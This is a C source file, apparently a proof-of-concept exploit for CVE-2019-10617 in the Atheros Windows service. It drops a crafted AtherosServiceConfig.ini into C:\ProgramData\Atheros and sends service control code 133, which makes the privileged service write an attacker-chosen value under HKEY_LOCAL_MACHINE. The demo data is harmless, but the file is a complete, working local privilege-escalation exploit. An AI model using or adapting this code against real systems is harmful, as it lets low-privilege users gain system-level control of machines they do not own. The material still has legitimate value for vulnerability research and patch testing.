CVE-2019-10617.c

#include <Windows.h>
#include <stdio.h>
#include <ShlObj.h>
#include <shlwapi.h>

BOOL CreateConfigFile() 
{
	HANDLE	hConfig;
	DWORD	dwBytesOut;
	CHAR	szFileData[512] = { 0 }; // Size may need to extended if you try to write a lot of data
	CHAR	szSelfPath[MAX_PATH] = { 0 };

	GetModuleFileNameA(GetModuleHandle(NULL), &szSelfPath, MAX_PATH);
	snprintf(&szFileData, sizeof(szFileData), "[AthService]\r\nregOpType=\"3\"\r\nregPath=\"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\CoolKey\"\r\nregValue=\"Hello\"\r\nregType=\"1\"\r\nregData=\"World\"");
	CreateDirectoryA("C:\\ProgramData\\Atheros", NULL); 
	hConfig = CreateFileA("C:\\ProgramData\\Atheros\\AtherosServiceConfig.ini", GENERIC_READ | GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, 0);
	if (hConfig != INVALID_HANDLE_VALUE) 
	{
		if (WriteFile(hConfig, &szFileData, sizeof(szFileData), &dwBytesOut, NULL)) 
		{
			CloseHandle(hConfig);
			return(TRUE);
		}
	}
	return(FALSE);
}

int main(int argc, char* argv[]) 
{
	SERVICE_STATUS	serviceStatus;
	SC_HANDLE		scManager;
	SC_HANDLE		scService;

	if (!CreateConfigFile()) 
	{
		printf("[!!!] Unable to create config file\n");
		ExitProcess(-1);
	}
	scManager = OpenSCManagerA(NULL, NULL, SC_MANAGER_CONNECT);
	if (scManager) 
	{
		scService = OpenServiceA(scManager, "AtherosSvc", SERVICE_USER_DEFINED_CONTROL);
		if (scService) 
		{
			ControlService(scService, 133, &serviceStatus);	// This triggers the read and operations inside AtherosServiceConfig.ini
			printf("[i] Sent 133 control code to AdminService.exe\n");
			printf("[i] You should see your new key in the registry\n");
			printf("[.] Press [ENTER] to exit...\n");
			getchar();
		}
		else 
		{
			printf("[!!!] Error calling service\n");
			CloseServiceHandle(scService);
			CloseServiceHandle(scManager);
			ExitProcess(-1);
		}
	}
	else {
		printf("[!!!] Error opening service manager\n");
		CloseServiceHandle(scManager);
		ExitProcess(-1);
	}
	ExitProcess(0);
}